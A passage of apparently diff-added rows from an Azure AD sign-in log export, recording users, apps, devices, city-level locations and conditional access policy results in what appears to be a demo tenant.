'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:08,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",5423bf62-9037-4448-bcaa-303305560c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,5423bf62-9037-4448-bcaa-303305560c00,SigninLogs,Sucess,41.90428925,-85.99833679
+1133,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,12:39.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,be614956-e5f4-402d-b08d-2af1bd5ce978,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:12,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",e9cfabe1-d666-446f-aeb7-581742480e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,e9cfabe1-d666-446f-aeb7-581742480e00,SigninLogs,Sucess,41.90428925,-85.99833679
+1134,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:57.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4cba8d91-6585-425b-a980-144dcef3eaa3,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",8d371308-4e1f-476f-97d6-c0eadd870e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,8d371308-4e1f-476f-97d6-c0eadd870e00,SigninLogs,Sucess,36.6404686,-78.26995087
+1135,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,09:06.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0f39072f-4724-48c3-b19c-b3bf1d5e7308,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:09,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",65ce963c-c870-4311-8389-19e58cca0c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,65ce963c-c870-4311-8389-19e58cca0c00,SigninLogs,Sucess,41.90428925,-85.99833679
+1136,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:07.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e1f25371-bcc3-4fea-85fb-281a7f1706c2,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",f4c49c86-cb9e-4a04-9dcc-1dcd24040c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,f4c49c86-cb9e-4a04-9dcc-1dcd24040c00,SigninLogs,Sucess,36.6404686,-78.26995087
+1137,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,09:53.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,61c1469f-80fb-0000-54e6-728b93444002,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:09,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",5423bf62-9037-4448-bcaa-30335f640c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,5423bf62-9037-4448-bcaa-30335f640c00,SigninLogs,Sucess,41.90428925,-85.99833679
+1138,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,38:06.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c9763235-3cdd-4360-8c12-43c9f841f430,Microsoft.aadiam,Microsoft.aadiam,,Katie Anderson,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 12:38,"{'operatingSystem': 'Windows 10', 'deviceId': '625a07a7-ef86-4c2e-adda-0a8d8f285cb7', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-2QNVSP4', 'trustType': 'Azure AD joined', 'isCompliant': True, 'isManaged': True}",e3458dbf-9c16-47a0-884d-be6322463e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -73.98007202148438, 'latitude': 40.77373123168945}, 'state': 'New York', 'city': 'New York'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim provided by external provider'}",Katie Anderson,52751c51-455a-4181-94de-579f12776b02,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,e3458dbf-9c16-47a0-884d-be6322463e00,SigninLogs,Sucess,40.77373123,-73.98007202
+1139,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,03:55.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,1058c9f3-c0aa-4a66-ae97-faad1ae5ce8a,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:03,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",d1f5cda6-13d0-4741-81eb-e38452340c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,d1f5cda6-13d0-4741-81eb-e38452340c00,SigninLogs,Sucess,41.90428925,-85.99833679
+1140,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:14.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50140,None,This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.,0,fcffe835-b94b-4ea3-828a-c627f7ac27b5,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 